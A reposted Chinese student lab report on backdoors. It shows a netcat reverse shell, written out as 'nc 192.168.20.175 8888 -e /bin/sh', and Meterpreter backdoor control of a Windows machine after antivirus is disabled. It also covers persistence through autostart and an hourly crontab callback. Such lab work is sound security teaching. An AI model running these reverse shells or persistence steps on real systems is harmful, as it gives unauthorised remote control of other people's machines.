博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20145313张雪纯网络攻防第二次实验
阅读量:5254 次
发布时间:2019-06-14

本文共 1025 字,大约阅读时间需要 3 分钟。

问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

解压压缩文件时里面含有后门程序。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
通过捆绑其他文件、设置开机自启动、设置定时任务、自己误点等。
(3)Meterpreter有哪些给你映像深刻的功能?
有大量控制被控主机的功能。获取键盘输入可能导致密码泄露。
(4)如何发现自己有系统有没有被安装后门?
啊这个只好寄希望与杀毒软件和防火墙了。。。

后门的概念

一类恶意程序,能够使得攻击者获取电脑控制权限。

这次实验中用到的后门程序是netcat和meterpreter。

首先测试是否连接成功并查询ip地址

885194-20170315170233057-1510837018.png

使用netcat使Windows获得Linux Shell

注意:后门程序可以使用主动连接和反弹连接的方式,但是主动连接方式容易被防火墙拦截,所以大多使用反弹连接的方式,即被控方主动连接控制端。反弹连接是相关ip参数设置为控制方ip。

  • 在Windows中打开监听
    885194-20170315165900245-9781548.png
  • 在Linux中输入oot@KaliYL:/var/www/html# nc 192.168.20.175 8888 -e /bin/sh反弹连接Windows。
  • Windows获取Linux的shell,测试成功

    885194-20170315165809604-2022766136.png

    利用Meterpreter生成后门程序,使得Linux获得Windows的shell

  • 首先使用KiTTYPortable.exe生成后门程序。

    885194-20170315170316588-537060822.png

  • 把程序复制到Windows系统中。复制之前要先关闭杀毒软件以及防火墙,以防程序被杀。
  • 在Linux中启动msf

    885194-20170315170429916-74933461.png

  • 对msf进行基本配置,在Windows中双击运行后门程序,反弹连接至Linux

    885194-20170315170629588-472732177.png

  • 连接成功后获取Windows的shell

    885194-20170315170658729-143288386.png

  • 测试help命令

    885194-20170315170840791-425162619.png

  • 获取命令行界面

    885194-20170315170906854-854527800.png

  • 获取ruby交互界面

    885194-20170315170924057-565045502.png

  • 查询运行进程

    885194-20170315170939354-366691693.png

  • 尝试截屏

    885194-20170315170952823-1896397484.png

  • 查看post模块

    885194-20170315171019635-7226079.png

  • 检查被控机是否是虚拟机

    885194-20170315171036791-830171140.png

  • 导出密码(失败)

    885194-20170315171059604-1882277137.png

  • 尝试安装Meterpreter(Persistence)到目标机失败,没有成功的输出

    885194-20170315171124088-567921382.png

  • run metsvc不成功

    885194-20170315171146448-1461800800.png

天啦噜

  • 尝试提权显示环境不正确
    885194-20170315173825026-2084489167.png

设置后门程序自启动

  • 在Windows中设置后门启动

    885194-20170315171221557-2050754655.png

  • 使用crontab在Linux中设置自动执行定时任务,编辑方法和vim相同。

    885194-20170315171328588-2111845546.png

  • 查看已编辑的自动执行任务,每小时的20分即会执行。另一台主机持续侦听即可获取shell。

    885194-20170315171355885-1829346512.png

转载于:https://www.cnblogs.com/entropy/p/6555263.html

你可能感兴趣的文章
application.yml
查看>>
杭电acm2034
查看>>
C++ STL 之 string
查看>>
图标搜集网址
查看>>
Python02 标准输入输出、数据类型、变量、随记数的生成、turtle模块详解
查看>>
SpringBoot29 登录逻辑、登录状态判断
查看>>
python 表格存取方法(转)
查看>>
USACO butter
查看>>
【LeetCode & 剑指offer刷题】树题8:26 树的子结构(572. Subtree of Another Tree)
查看>>
图论(最短路问题)总结
查看>>
JavaScript: 让拖动支持iphone/ipad触摸
查看>>
HTML 链接
查看>>
【搬运】Wget 命令详解
查看>>
很少写博客了
查看>>
基于 Confluence 6 数据中心的 SAML 单点登录设置你的身份提供者
查看>>
【Educational Codeforces Round 36 B】Browser
查看>>
【Henu ACM Round#16 A】 Bear and Game
查看>>
【codeforces 766B】Mahmoud and a Triangle
查看>>
Another MySQL daemon already running with the same unix socket.
查看>>
Ubuntu配置
查看>>